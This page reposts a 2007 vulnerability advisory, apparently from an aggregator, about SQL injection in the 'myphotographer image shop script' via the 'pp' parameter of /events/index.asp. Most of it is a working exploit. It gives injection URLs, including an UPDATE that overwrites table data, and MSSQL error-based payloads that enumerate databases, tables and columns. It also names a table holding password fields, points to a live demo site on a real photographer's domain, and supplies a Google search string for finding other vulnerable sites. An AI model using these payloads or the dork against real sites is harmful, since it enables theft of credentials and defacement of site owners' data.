Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17879
HistoryAug 23, 2007 - 12:00 a.m.

myphotographer image shop script /events/index.asp sql injection

2007-08-2300:00:00
vulners.com
85
sql injection
myphotographer image shop
events/index.asp
codexploder
biyosecurity.net
expw0rm.com
biyosecurityteam
liz0zim
eno7
3apa3a
sql methot
example.com
patch
eventss
tbl_photography_eventdb
description
date
password
password_flag
publish_datecity
demo site
bygracephotography.myphotographer.com

myphotographer image shop script /events/index.asp sql injection

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : Biyosecurity.net,expw0rm.com

thx : BiyoSecurityTeam,Liz0ziM,eno7,3APA3A

Sourge site : http://www.myphotographer.com/support/

#####################################################

1-) example.com/[patch]/index.asp?ee=1559&pp=(sql methot)

1-) example.com/events/index.asp?ee=1559&pp=(sql methot)


2-) example.com/[patch]/index.asp?ee=1559&pp=(sql methot)

2-) example.com/events/index.asp?ee=1559&pp=(sql methot)

2-) example.com/events/index.asp?ee=1559&pp=1'

2-) example.com/events/index.asp?ee=1559&pp=1 having 1=1

2-) example.com/eventss/index.asp?ee=1559&pp=1,2,3,4,5

2-) example.com/events/index.asp?ee=1559&pp=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–

2-) example.com/events/index.asp?ee=1559&pp=1 group by tbl.column having 1=1

#for db : convert(int, db_name(1)

   : convert(int, db_name(2) 

#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

#tbl : tbl_photography_EventDB
#column : description,date,password,password_flag,Publish_Datecity

##########################################################

demo site: http://www.bygracephotography.myphotographer.com/events/description.asp?ee=2588&pp=194755

google search code : "All images are copyright protected by the photographer" inurl:"/events/index.asp?ee"

example site : http://www.bygracephotography.myphotographer.com/events/